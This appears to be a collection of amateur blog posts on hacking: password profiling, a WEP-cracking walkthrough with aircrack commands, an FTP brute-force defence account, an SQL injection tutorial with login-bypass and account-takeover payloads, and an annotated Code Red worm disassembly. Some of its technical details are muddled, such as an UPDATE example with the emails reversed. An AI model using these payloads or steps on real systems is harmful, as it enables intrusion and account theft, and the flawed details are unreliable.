New Methods of Hacking

This is where I will be talking about the new generation of hacking and theories.

Password Profiling
Okay, so everyone knows that the current brand of password cracking involves one of three different methods. One is a dictionary attack using real words from a dictionary list. Another is a brute force attack that systematically tries every possible number, letter, and character combination over a large amount of time. The third is to use a rainbow table.

What if there was an easier method to discover someone's password, that doesn't use random generation, but profiling? That is, a program that can scan a person's personal folders and files and look for patterns.

It looks as though the Wyd Password Profiler will do just that. By looking for patterns in the targets behavior or personality, the program is able to construct viable passwords.

As an example: Tom loves baseball. He has pictures of his favorite team, scores, screen savers, etc stored on his system. It is logical, therefore, that his password will contain something about this sports team, or one of the players. By knowing this information, the attacker can focus on that attack vector, instead of running a dictionary attack list that may only contain the word baseball (which would not be sufficient).

The purpose of this type of attack is not to build an extensive list to attack the victim with, but is instead used to take out false positives, and narrow down the possible passwords significantly.

Rogue Access Point Attack

Remember Microsoft Windows' ability to automatically connect you to your favorite networks? Well, that may not be the best feature Microsoft has thought up. By exploiting a bug in the wireless manager, an attacker can sniff out your favored networks, and change the SSID of their rogue network to match it. Windows will automatically connect you to that network, without alerting you. At this point, they are free to start scanning your computer, transmit malware, or or use a program like wireshark to capture your packets.

More information on this attack can be found here.

However, there is a potential defense against this, which uses the same program used to disconnect the victim from a good network (void11) and uses a matchlist that you generate to automatically refuse connections. However, it is limited to prism cards, and requires a bit of technical knowledge. You can find information on it here.

BackTrack

DISCLAIMER: Yes, this will show you how to hack into a wireless network. This is very much ILLEGAL. The purpose of this writeup is for educational purposes only. I am demonstrating the weakness of WEP encryption on my own network. If you wish to try this for yourself, I suggest you buy a wireless router and attempt to crack that.

_____________________________________________________________________

I wanted to post a live instructional movie instead of a set of pictures. However, I am still attempting to get my wireless card working in a virtual environment and/or an open source video capturing utility that runs in Back Track 3.

I could list the set of programs I will be using here, but they are listed throughout the blog. I believe it is better to say that I am using Back Track 3 (beta) using a live install and a Linksys WMP11 wireless NIC. You can find details on downloading and installing Back Track 2 and 3 here.

Alright, there are a few things I'm leaving off the beginning. The first is setting your wireless card to monitor mode. I had a little trouble with this at first. I have to extend a thank you to Brian for pointing me in the right direction.

Another is the list of compatible wireless cards. You can find those circulating around the net (at the ubuntu website, the aircrack site, and a few others). I am also leaving off driver installation. Some wireless cards require madwifi drivers to work. You can find out more about this via the Madwifi webpage.

It is actually very easy to set your wireless NIC to monitor mode in Back Track 3. Play around with some of the programs, and if you are still having trouble, try the Remote Exploit Forums.

Okay, so you have your card in monitor mode (or you're just curious and want to read on). The first step is to make certain that your card is in fact running in monitor mode. To do this, open the terminal and type iwconfig Look for your wireless card. The window should be displaying as such:



Notice the second line in eth2? It says "Mode:Monitor." This confirms that the wireless card is set to monitor.

Now, you can do one of two things. The first is run a wireless sniffing program, that will allow you to see hidden SSID's. I will not be demonstrating that in this tutorial. Instead, we will use a program called airodump to capture the packets and create a file that we can use in a cracking program. There are several options you can set when using Airodump.



This may seem overwhelming at first, but its easy to figure out. The options we are interested in right now are: --ivs, -w, and -channel 6.

This is because I already know the target is using channel 6, and don't need to scan any other channels. --ivs will store only captured ivs. Ivs are initialization vectors that preamble the key. There are 16.7 million varieties, which may sound like a lot. However, they are only 3 bytes in size, and so even a weak computer can run an algorithm that checks for patterns and eventually breaks the wep key. For our purposes, we only need to record these. Finally, the -w or write option will write the stored information to a .cap file that we can use at a later time.

So we type in the command airodump-ng -w --ivs -channel 6 eth2

\

Alright. Now airodump is running and pulling ivs out of packets. How long does this need to run for? It varies depending on the type of encryption and complexity of the code. In this case, it is a 64 bit hex code using WEP encryption. I'll let it run for 20 minutes, but I could probably do it in as few as 5 if I'm lucky.



Notice that there is a second wireless AP that popped up? Airodump will capture all available information on any selected channel, or even scan every channel within the range specified.

Now that the 20 minutes is up, we can press ctrl+c to stop the dump and exit back to the konsole. The -w command now creates a capture file with all the information we need.



We can see the name of the capture file is ivs-01.cap. Now, in the konsole, type aircrack-ng --help.

This brings up the aircrack options. Aircrack is the program we will use to crack the encryption and discover the code.



We really don't need any of the special options at this point. So simply type aircrack-ng ivs-01.cap. We are now presented with an option. Remember that other AP that came up when airodump was running? It saves all of this information in the file. If there were 10 ap's during the airodump process, there would be 10 ap's to choose from now. We are only interested in the first, which is airwave (the SSID of my router). So we type 1 and press enter.



Congradulations! There is the key to my wireless network. It took about .5 seconds to produce, though it is a very weak key with the worst possible encryption. I will look into cracking 128 bit WEP, and possibly WPA in the future.

Watching a hack attempt from the other side

Alright, I'm going to bounce back to hacking for a moment. I currently run an FTP server for friends and classwork. I am using filezilla, an opensource FTP server program available from http://filezilla-project.org/.

After installing a new router, I had let it sit idle. I recently wished to share some pictures with a friend, and so I opened the ports. As soon as I did so, someone started using a dictionary attack against it.



So I contemplated a few things. I needed to keep my server available, of course, but these attacks would eat up system resources, and though my passwords are secure, its impossible to say what the complexity of their program is.

I already have a timeout scheme set (5 seconds between failed attempts) but I decided to go one step further. I implemented a ban system. After 10 failed attempts in a single hour, they would be banned for an hour.

I could also have instituted an permanent ban. However, this would hamper availability too much. People forget their passwords.

So the result looks like this:



I also have some important information in the log files. One is the time of the attacks, the other is the IP address of the attacker. Notice that, despite there are multiple IPs, they are all in the same block. First, I wanted to know exactly where the attacks were originating. To do this, I used a simple website called the Community Geotarget IP Project. I entered the attacker's IP address into the whois, and was able to discover the country of origin, but little else:



So, I have the country of origin, Thailand, but I want to know more. So I decided to visit another IPWHOIS site. This one is DNS Stuff. A quick IP search was much more revealing:



This has revealed that the IP is owned by the Ministry of Education. It has contact information, probably for a network administrator and the head of the Ministry of Education.

At this point, its up to my discretion whether I wish to notify the Network Administrator, or go on about my business. If this was a major network, I would need to employ a large staff just to handle these situations, and so I would not pursue any action unless the attack was successful.

Let me step back for a moment and speak of the security implications.

As previously stated, my FTP server had been online, but the port was blocked, so nobody could actually "see" my server.

Two days ago, I opened the ports so that a friend could download from the server. In those two days, I counted at least 5 attacks. I can't be sure of exactly how many yet, because I have not checked the recorded log, only the displayed log:



How could so many attacks start from such remote places without any knowledge that my server even exists? Well, my first assumption is a port scanner. That is, a program that scans IP's, and checks to see if it gets any response from specific ports. In this case, it would scan for port 21, which is reserved for FTP programs. I decided to do a google search and see if I could turn up a program that does this.

My very first search turned up this.

So the software is very easy to find and install, and is not complicated to use. We can safely assume that the attacker is using this method to find my server. And if the process is that simple, how can I step up my security? I will be researching methods for this. However, I believe that if I push integrity too hard, I will lose too much availability.

Log File

Okay, so I've gone back and reviewed my log files. The main log file is over 8 megabytes now of pure, single line text. I pulled some of the IP's, but this is not nearly a comprehensive list:

217.204.34.34
75.94.180.204
202.143.182.204
80.229.40.186
134.39.100.71
222.211.79.106
209.252.98.185
222.200.161.12
61.135.142.220
86.105.40.246
61.129.52.230

This is about 20% of the total IP's that are in the log file. Each one has at least 30 failed attempts to brute force past the login prompt.

From this I've learned a couple things.

1. Log files suck. It's not too much fun to dig through thousands of log entries to find information, and further more, most of the information is rather useless. Do I need to know that I was attacked, unsuccessfully, 50 times by the same IP? Probably. But do I need a new log entry for each attack by the same IP address? No, I don't. Not in this format, anyway. A program that sorts and organizes this information using drop down menus or some such would be very nice.

2. Security is pretty important. If I had an administrator account with a weak password, all the information on the FTP server would be compromised.

3. Trying to balance Availability, Integrity, and Confidentiality is more difficult than it seems.

I am looking into a new hosting format that functions like FTP, but uses a web interface and works on port 80 instead of 21. This will increase availability, while hopefully increasing security as well. Port sniffing for port 80 is a pretty big waste of time. The program can be found at the HFS website.

I will post another blog when I have more information, or have decided on a course of action for the server.

Hacking x2

Now that I've established a little information on hacking and hackers, I'll update with some information that shows the procedures of hacking, and the dangers of being hacked. Once again, I will use publicly available material as references.

Injections

Not the kind that that was developed to rip off your insurance company, but the type that alters database and scripting code to allow admittance to otherwise locked sites. This is one of the more simple hacks, and requires surprisingly little skill. It does require that the target system lack necessary security and sanitation code. However, because many admins and webhosts are rather lazy, these hacks have remained useful for quite some time.

SQL Injection

A SQL (pronounced "sequel") Injection relies on the very basic database programming msSQL or mySQL to implement. Note that SQL is not the only language used for databases, but is quite common. It uses plain English (or country of choice) commands, such as "Select fieldlist from table ... etc etc"

These commands are entered from exposed fields on the internet. If you have ever seen a page that asks for your user name and password, for example, you are possibly looking at a SQL form. When you enter your user name and password, the database compares it to a field of user names, and then the password associated with the typed user name. If they match, you are allowed access. If not, you are given an error message.

Think of it as an excel spreadsheet. Each row corresponds to a certain type of data. So row one might be your user name, row two your password, and row three your email. When you type your user name, it finds that unique user name, and then checks to see if the password you entered is the same. If it returns true, you are allowed access.

Because SQL cannot interpret by itself if a benign user name and password was entered, or if another, malicious SQL command was given, it simply carries out the orders as it was designed to.

So an attacker will first begin by establishing these things:

1. Is this a SQL Database? If yes, skip to 2. If no, Skip to end
2. What is the field name for "username"
3. What is the field name for "password"
4. What is the field name for "email"

To establish if the target uses a SQL database, the attacker will feed it a short SQL snippet. Remember that a SQL database will understand any SQL commands, even if it can't run them or they produce an error. What is typed into the login field is not important, after all, passwords are used as the universal key, user names are merely a reference point. In the password field, a command such as x' or '1'='1 will be typed.

In any SQL database, when a comparison is called between two fields, if they match a value of true will be returned. Because "or" automatically interrupts the search, 1=1 is tacked onto the end of the resulting search. The password is most definately not "x" but before the database returns false, it reads the "or" statement and the subsequent "1=1." This statement, is of course, true. Because the database is looking for a true answer, not a false, it pushes the "true" value.

Now, you might think it silly to have the database "look" for a true answer instead of being stoic and neutral. However, you must think about a query in conventional terms. Say you are going to the grocery store to buy a gallon of milk. When you ask a sales clerk where the milk is, you do not say "where is the milk not?" He would have to take you to every part of the store the milk is not at before you could determine where the milk is. Instead, you ask "where is the milk?" Now he will take you to the precise location the milk is kept. Keep in mind that there is not a single jug with "milk" stenciled into it, but all forms of milk. He cannot tell you where the 2% milk is unless you ask him specifically.

The initial discovery of the milk would result in a return of "true." You can, of course, refine your search if possible, but the point remains.

Now, using this analogy, imagine you went into Sears and said "Where is the milk or drills?" The clerk would tell you that there is no milk, but he will not then tell you to go away. The "or" statement will inspire him to take you to the drills. There was no milk, but the query for drills returned true.

So, if the attacker initiates an injection such as x' or '1'='1, the database must respond. To do this, the attacker can use the "mail me my password" feature. Though there are other ways to do this, it must be a method that will return some sort of value. Remember that the attacker will be unable to see the actually SQL code.

Let us say that the return was "We have sent you an email with your password in it." This will tell the attacker that they have found a SQL database, and what's more, it is not "sanitized." That is, there is nothing checking the code before it is executed to ensure that an attack is not occurring. Keep in mind that this is executing code in the database, so someone was just sent an email with steps to recover their password. Just as no systems can keep hackers out, no hackers can crack undetected. There is always a log, some trace to tell they were or are working.

Okay, so the attacker knows this is a SQL database with little or no security. Now they need to build an image of what the database looks like in their mind. Though it is better to use a pen and paper or open a text document. Each field has a unique name. The password list, for example, may be password, passwrd, pword, secret, etc. Each field that must be exploited by the attack must be named. There is no easy way to do this, but almost all databases use the same basic words to denote the field. This is again attributed to the laziness of the designers or admins.

To begin this, the attacker will change the code slightly. Now it will look more like x' AND password IS NULL; --

AND is substituted for OR, because we don't want it to return true. This is especially true when working with the email field. The attacker doesn't want 10 change of password emails going out to all 10,000 people in the database. If an error such as "missing syntax" is returned, its the wrong field name. However, if the attacker gets a response such as "no match found" then they know it is the correct field name. The three most important fields for the attacker to acquire are "logon/user name, password, and email. Other fields can be found this way, but they really serve no purpose. Once the attacker has access to all the resources by hacking into the system, they can acquire the same information in a fraction of the time.

Now that the attacker has figured out the correct field names, they are ready to move on to gaining full access. To do this, they must either guess a password, or use a much easier method of overriding an existing user and changing their password with a SQL injection.

Note that the attacker may have access to one SQL database, but it may not be the database that stores login credentials. To verify this, first the table name must be acquired. The code for this is x' AND 1=(SELECT COUNT(*) FROM tabname); --. Note that the attacker must guess the table's name, however, as usual the names are generally obvious. Members, users, etc. The command x' AND tabname.email IS NULL; -- wil l verify that this is in fact the table that is being actively used for login credentials.

After all this is settled, the attacker will need a valid login. Remember that this information is readily available. Many sites set the user name to match the account name. On a forum, for example, the name you login with is the name that is displayed when you post in threads. Also some variation will be used for the real name of the webmaster or contact listed on the website.

Using that user name and the command:
x';
UPDATE listname
SET email = 'victim's@email.com'
WHERE email = 'youremail@email.com

The attacker injects the command to change the table, deleting the original email and substituting it with theirs.

Now the attacker simply initiates the "reset my password" function, and it sends the password reset link to their email.

They now have full administrator privileges to the system, or the credentials of another user which they can cause havoc with. At their victim's expense, of course.

A written source for this can be found here

Here are some video's of the attacks in action:







So...

Consider this a warning! Don't be lazy. Nobody can guess a password field named "Iowatachata" ... okay, so you aren't likely to tell your boss that you changed all the SQL fields to random sesame street characters. You can, however, sanitize the input so that only characters which are allowed for passwords can be entered into the database. The characters =, ;, and ' should never be valid characters for passwords or user names. Ensure that they will be rejected.

There are many more steps to securing a SQL database. However, as with all security operations, the methods of securing a system is far harder than the methods used to break the security.

HACKING

What is hacking?

Hacking is a widely feared and completely misconstrued activity. To the average person, a hacker is a kid with a super powerful computer in a clean room with super colorful display of pictures and characters flashing on the screen. They rapidly press random buttons and are suddenly presented with a prompt to enter basic commands.

The reality is, the definition of hacking is about as complex as the actual task.

First, there are multiple forms of hacking. The true "hacking" is usually done by college and graduate level students, or IT professionals probing for program or hardware weaknesses. White hat/red hat/black hat definitions are technically moot, since hacking for malicious purposes is covered by the term Cracking.

Using premade tools or walkthroughs is not hacking, and is considered being a "script kiddie." These are the younger (generally high school level) users who have little or no skill, but want to be considered "elite" by others. While the programs they use are capable of cracking into secured systems, the result is random damage and loss of data that the script kiddie has no facilities to understand.

Think of the difference in these examples:

Hackers: A group of painters are hired to paint a mural on the side of a building that others can see.

Crackers: Paint that same mural with the same skill, but do it without permission, leaving the owners of the building to hire someone to paint over it.

Script Kiddie: A kid with a can of spray paint who draws crude pictures of genitalia on street signs.

How does hacking work?

Hacking is essentially solving a complex puzzle involving a constantly evolving set of rules, math, and computer language. Some "hacks" as they are called, are actually quite simple, and are a result of the laziness of the software engineers, others require nothing short of a mathematical genius to solve.

If one is curious, they have only browse a video sharing site, such as youtube.

This is an example of a more complex bluetooth hack:



However, some are a bit more simple, and show the dangers of being hacked a little better. This is another bluetooth hack that is done much quicker using one cellphone to attack another. Note that most bluetooth has a range of approximately 10 meters, which is a little under 30 feet... the perfect distance for someone to hack from the other side of a starbucks. Some, more powerful bluetooth devices can transmit and recieve up to 100 meters:



However, some tutorials will even go in depth and show you the entire process of hacking:



This makes it pretty easy to start basic hacking. There are many more places that yield advanced information. Sources other than the internet also exist. For example, in high school, I visited my local radioshack, and found a large book with every radio frequency used by the DOD, DOT, EMS, and Air Traffic Control/FAA. These types of books also exist for IP's and security protocols in place for the same entities.

A quick google turned up this in reguard to DoD IPv4 allocation (click).

This is a publicly available list of IPv4 Class A assignments. Its a little like putting a bullseye on a tank. Everyone knows where to aim.

Do not be mistaken, however. Just because you know where your target is, doesn't necessarily mean hacking it will be easy.

Why bother?

Each individual has their own reasons, and this is why there are multiple names for "hackers." While a hacker may try to prove a system is vulnerable, or be curious about the contents of a server, they will leave the system in the same state they discovered it. They rarely ever harm a network, and if so, its usually an accident.

Crackers, on the other hand, use their skills to damage or destroy data, systems, and /or deny other users the ability to access network resources. Though money may be a secondary motive, their primary is simply destruction and bragging rights.

Emerging Threats

As computers and computing knowledge becomes more prevalent, the number of attackers and attacks continue to increase. The lure of easy money and soft targets of opportunity for a new breed of terrorist is too strong to ignore. Industrial espionage is becoming common place.

What Hacking is Not

Asking someone for their password, then using it, is not hacking. That is social engineering. This goes for looking over someone's shoulder or claiming to be the last prince of an African country named Robatswania. These attacks are made on those who are, sorry to say, ignorant or uninformed.

Identity theft is not hacking. The information may have come from hacking, but identity theft is not remotely exclusive to hacking. It is common for the information to be found in dumpsters, recycle bins, and laying right on somebody's desk. The forged documents can be created on a computer without any access to the internet.

What Hacking will not Accomplish

Hackers cannot make your computer explode and kill you.
Hackers cannot steal any information that is not stored electronically. If your filing cabinet is pried open when you come home, that is burglary, not cracking. They can't hijack all the tv stations in the world to broadcast a message.

It really comes down to information and electronic storage.

How to avoid being hacked

1. don't use a computer.

Thats pretty much it. Any information you send over a network passes many nodes and is stored in many forms in many locations. The potential for your system to be hacked or cracked exists while it is connecting to the internet, or any network or machine that is connected to the internet.

There are, of course, the standard methods of weeding out the weaker hackers, such as a firewall, anti-virus, security updates etc. The biggest defense that a common person has, is to remain anonymous. Few people will waste their time on a system with no information or value.

Malware

The departure from the 1980's and the advent of the internet on home computers world wide, as well as the increase in communication speed and decrease in cost of networking, information has become increasingly less secure. High speed internet connections have created an additional security breach, as they are continuously connected, unlike archaic phone connections of modems.

Cybercrime has continued to increase at an exponential rate, but more so for malware. I believe this is due mainly to the passive nature of malware. Unlike hacking single computers or networks, which require great amounts of time and work to affect a single entity, a virus can be generated by a novice coder and deployed to a few open systems without ever actively penetrating a system. The malicious software can then infect millions of computers without ever requiring additional information or control from the creator.

Additionally, in current media, only the hackers who try to bring down networks and actively pursue network cracking are apprehended and punished. Yet those who deploy viruses are usually faceless, rarely mentioned, or only punished if they also actively crack a network or commit conventional crimes. The common consensus among people without a tech background, is that malware creators are not apprehended.

However, they are caught and punished, even worldwide.

So what do these programs actually look like?

In reality, very small. When you are trying to remain undetected, smaller is better. It also allows for quicker transmission over networks.

There are three parts to to any piece of malware:

Repeater: A section of code that allows the program to reproduce itself.

Concealer: A section of code that allows the program to append itself to harmless programs, or mascaraed as a harmless file.

Payload: This is the code that enables the software to damage or change the system. This could be anything from creating windows with advertisement to deleting or corrupting system or boot files.

This means that a virus or worm can be as small as 3 lines of code.

Trojans are larger, but make use of a concealer by being joined with another file, such as a jpg. By doing this, then renaming the file randomnakedwoman.jpg.exe, a messenger program such as ICQ or MSN will leave off the last extension, so that the file will appear to be randomnakedowman.jpg. This can be replicated using something like newtpsreportcoversheet.doc.exe.

The code for these programs is rather anticlimactic to the average person. There are no "destroy computer!!!!" type commands, no embedded videos of a talking Davinci paintings with voices overs, and no slick user interfaces with a single password box. In fact, the average person would think it was merely a page full of gibberish.

The following is actual code from the "code red" worm that infected the whitehouse.gov website:

seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:00000000 47 45 54 20 2F 64+aGetDefault_ida db 'GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 65 66 61 75 6C 74+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 2E 69 64 61 3F 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'N%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u685'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db '8%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53f'
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'f%u0078%u0000%u00=a HTTP/1.0',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-type: text/xml',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'HOST:www.worm.com',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db ' Accept: */*',0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 'Content-length: 3569 ',0Dh,0Ah
seg000:00000000 4E 4E 4E 4E 4E 4E+ db 0Dh,0Ah
seg000:000001D6
seg000:000001D6 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:000001D6
seg000:000001D6 ; this is the worm body. this is the code that actually does the work
seg000:000001D6 ; Attributes: bp-based frame
seg000:000001D6
seg000:000001D6 WORM proc near
seg000:000001D6
seg000:000001D6 var_218 = byte ptr -218h
seg000:000001D6 var_190 = dword ptr -190h
seg000:000001D6
seg000:000001D6 55 push ebp
seg000:000001D7 8B EC mov ebp, esp ; switch esp to ebp
seg000:000001D9 81 EC 18 02 00 00 sub esp, 218h ; set up space for local variables
seg000:000001DF 53 push ebx ; save a few regs
seg000:000001E0 56 push esi
seg000:000001E1 57 push edi
seg000:000001E2 8D BD E8 FD FF FF lea edi, [ebp+var_218] ; fill in stack vars with 0xcc
seg000:000001E8 B9 86 00 00 00 mov ecx, 86h ; '�'
seg000:000001ED B8 CC CC CC CC mov eax, 0CCCCCCCCh
seg000:000001F2 F3 AB repe stosd ; Store String
seg000:000001F4 C7 85 70 FE FF FF+ mov [ebp+var_190], 0 ; set 190h to 0
seg000:000001F4 00 00 00 00 ; this zeros out the memory that holds the GetProcAddress Call.
seg000:000001FE E9 0A 0B 00 00 jmp WORMCONTINUE ; Jump
seg000:000001FE WORM endp
seg000:000001FE
seg000:00000203
seg000:00000203 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:00000203
seg000:00000203
seg000:00000203 DataSetup proc near ; CODE XREF: seg000:00000D0Dp
seg000:00000203 8F 85 68 FE FF FF pop dword ptr [ebp-198h]
seg000:00000209 8D BD F0 FE FF FF lea edi, [ebp-110h] ; set ebp -198h to address of the data segment
seg000:00000209 ; set edi to ebp -110
seg000:0000020F 64 A1 00 00 00 00 mov eax, large fs:0 ; set eax to an ebp+val
seg000:00000215 89 47 08 mov [edi+8], eax ; set ebp+118 to 0
seg000:00000218 64 89 3D 00 00 00+ mov large fs:0, edi ; set fs reg ?
seg000:0000021F E9 6F 0A 00 00 jmp JUMP_TABLE1 ; Jump
seg000:0000021F DataSetup endp
seg000:0000021F
seg000:00000224
seg000:00000224 ; ��������������� S U B R O U T I N E ���������������������������������������
seg000:00000224
seg000:00000224
seg000:00000224 DO_RVA proc near ; CODE XREF: seg000:00000C93p
seg000:00000224 8F 85 60 FE FF FF pop dword ptr [ebp-1A0h]
seg000:0000022A C7 85 F0 FE FF FF+ mov dword ptr [ebp-110h], 0FFFFFFFFh ; set 110h to 0xffffffff
seg000:00000234 8B 85 68 FE FF FF mov eax, [ebp-198h] ; load eax to the data address
seg000:0000023A 83 E8 07 sub eax, 7 ; sub 7 from the data segment, putting you at: oD0B
seg000:0000023D 89 85 F4 FE FF FF mov [ebp-10Ch], eax ; set ebp - 10c to oD0B
seg000:00000243 C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 77E00000h ; set 1a8 to 0x780000
seg000:00000243 00 00 E0 77 ; __NULL_IMPORT_DESCRIPTOR+15D4h
seg000:0000024D E8 9B 0A 00 00 call DO_REWRITE ; jump into ced, do stuff, then jump back
seg000:00000252
seg000:00000252 RVA_TOP: ; CODE XREF: DO_RVA+213j
seg000:00000252 83 BD 70 FE FF FF+ cmp dword ptr [ebp-190h], 0 ; this is null on the first loop through, due to a null set at init.
seg000:00000252 00 ; The purpose of this loop point is to loop through DLL Names in the RVA table, looking for KERNEL32.dll, or more specificly, KERN
seg000:00000259 0F 85 DD 01 00 00 jnz GETPROC_LOADED ; go here after GetProcAddr Is loaded
seg000:0000025F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 77E00000
seg000:00000265 81 C1 00 00 01 00 add ecx, 10000h ; make ecx 0x77e10000
seg000:0000026B 89 8D 58 FE FF FF mov [ebp-1A8h], ecx
seg000:00000271 81 BD 58 FE FF FF+ cmp dword ptr [ebp-1A8h], 78000000h ; is it msvcrt?
seg000:0000027B 75 0A jnz short NOT_MSVCRT ; if it is not, then jump here
seg000:0000027D C7 85 58 FE FF FF+ mov dword ptr [ebp-1A8h], 0BFF00000h
seg000:00000287
seg000:00000287 NOT_MSVCRT: ; CODE XREF: DO_RVA+57j
seg000:00000287 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:0000028D 33 C0 xor eax, eax ; null out eax
seg000:0000028F 66 8B 02 mov ax, [edx] ; move the low half of *edx into eax
seg000:0000028F ; should be something like 5a4d
seg000:00000292 3D 4D 5A 00 00 cmp eax, 5A4Dh ; Compare Two Operands
seg000:00000297 0F 85 9A 01 00 00 jnz TO_RVA_TOP ; jump if eax is not 5a4d
seg000:0000029D 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002A3 8B 51 3C mov edx, [ecx+3Ch] ; set edx to *ecx+3ch
seg000:000002A3 ; should be something like 0x000000D8
seg000:000002A6 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to 0x77E10000
seg000:000002AC 33 C9 xor ecx, ecx ; null out ecx
seg000:000002AE 66 8B 0C 10 mov cx, [eax+edx] ; set ecx to what is at eax+edx
seg000:000002AE ; should be something like 0x00004550
seg000:000002B2 81 F9 50 45 00 00 cmp ecx, 4550h ; Compare Two Operands
seg000:000002B8 0F 85 79 01 00 00 jnz TO_RVA_TOP ; jump if ecx is not 0x00004550
seg000:000002BE 8B 95 58 FE FF FF mov edx, [ebp-1A8h] ; set edx to 0x77E10000
seg000:000002C4 8B 42 3C mov eax, [edx+3Ch] ; set eax to what's at 0x77E1003Ch
seg000:000002C4 ; should be something like 0x000000D8
seg000:000002C7 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; set ecx to 0x77E10000
seg000:000002CD 8B 54 01 78 mov edx, [ecx+eax+78h] ; set edx to what's at address 0x77E100B4
seg000:000002CD ; should be somehing like 51E00
seg000:000002D1 03 95 58 FE FF FF add edx, [ebp-1A8h] ; add 0x77E10000 to edx
seg000:000002D7 89 95 54 FE FF FF mov [ebp-1ACh], edx ; set ebp-1AC to 0x77E61E00
seg000:000002DD 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; set eax to 0x77E61E00
seg000:000002E3 8B 48 0C mov ecx, [eax+0Ch] ; set ecx to what is at 0x77E61E0C
seg000:000002E3 ; should be something like 0x005394E
seg000:000002E6 03 8D 58 FE FF FF add ecx, [ebp-1A8h] ; add 0x77E10000 to ecx, to get something like 0x77E6394e
seg000:000002EC 89 8D 4C FE FF FF mov [ebp-1B4h], ecx ; set ebp-1B4 to 77E6394E
seg000:000002F2 8B 95 4C FE FF FF mov edx, [ebp-1B4h] ; set edx to 77E6394E
seg000:000002F8 81 3A 4B 45 52 4E cmp dword ptr [edx], 4E52454Bh ; looking for our specific code (NREK) - KERN spelled backwards.. this is to find KERNEL32
seg000:000002FE 0F 85 33 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000304 8B 85 4C FE FF FF mov eax, [ebp-1B4h]
seg000:0000030A 81 78 04 45 4C 33+ cmp dword ptr [eax+4], 32334C45h ; looking for our specific code (23LE) - EL32 spelled backwards.. this is to find KERNEL32
seg000:00000311 0F 85 20 01 00 00 jnz TO_RVA_TOP ; Jump if Not Zero (ZF=0)
seg000:00000317 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h] ; ok, we have kernel32, now get the functions we need.
seg000:0000031D 89 8D 34 FE FF FF mov [ebp-1CCh], ecx ; store the kernel32 base addr.
seg000:00000323 8B 95 54 FE FF FF mov edx, [ebp-1ACh] ; set edx to the offset from the base
seg000:00000329 8B 85 58 FE FF FF mov eax, [ebp-1A8h] ; set eax to the base
seg000:0000032F 03 42 20 add eax, [edx+20h] ; add the offset pointer to the base to get the RVA addr.
seg000:00000332 89 85 4C FE FF FF mov [ebp-1B4h], eax ; set ebp-1b4 with rva holder
seg000:00000338 C7 85 48 FE FF FF+ mov dword ptr [ebp-1B8h], 0 ; set ebp-1b8 to 0
seg000:00000342 EB 1E jmp short RVA_PROCESS_FUNC ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000342 ;
seg000:00000344 ; ���������������������������������������������������������������������������
seg000:00000344
seg000:00000344 RVA_INNER_TOP: ; CODE XREF: DO_RVA+20Ej
seg000:00000344 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h] ; this moves on to the next func in an rva table
seg000:0000034A 83 C1 01 add ecx, 1 ; Add
seg000:0000034D 89 8D 48 FE FF FF mov [ebp-1B8h], ecx
seg000:00000353 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000359 83 C2 04 add edx, 4 ; Add
seg000:0000035C 89 95 4C FE FF FF mov [ebp-1B4h], edx
seg000:00000362
seg000:00000362 RVA_PROCESS_FUNC: ; CODE XREF: DO_RVA+11Ej
seg000:00000362 8B 85 54 FE FF FF mov eax, [ebp-1ACh] ; This is the part of the inner RVA loop that compares the current RVA function to GetProcAddr.
seg000:00000362 ;
seg000:00000368 8B 8D 48 FE FF FF mov ecx, [ebp-1B8h]
seg000:0000036E 3B 48 18 cmp ecx, [eax+18h] ; Compare Two Operands
seg000:00000371 0F 8D C0 00 00 00 jge TO_RVA_TOP ; this is the end of the inside loop(there are no more functions), goto RVA top and try again.
seg000:00000377 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:0000037D 8B 02 mov eax, [edx]
seg000:0000037F 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:00000385 81 3C 01 47 65 74+ cmp dword ptr [ecx+eax], 50746547h ; looking for GetProcAddr (PteG cmp)
seg000:0000038C 0F 85 A0 00 00 00 jnz TO_RVA_INNER_TOP ; didn't match, try the next one.
seg000:00000392 8B 95 4C FE FF FF mov edx, [ebp-1B4h]
seg000:00000398 8B 02 mov eax, [edx]
seg000:0000039A 8B 8D 58 FE FF FF mov ecx, [ebp-1A8h]
seg000:000003A0 81 7C 01 04 72 6F+ cmp dword ptr [ecx+eax+4], 41636F72h ; looking for GetProcAddr (Acor cmp)
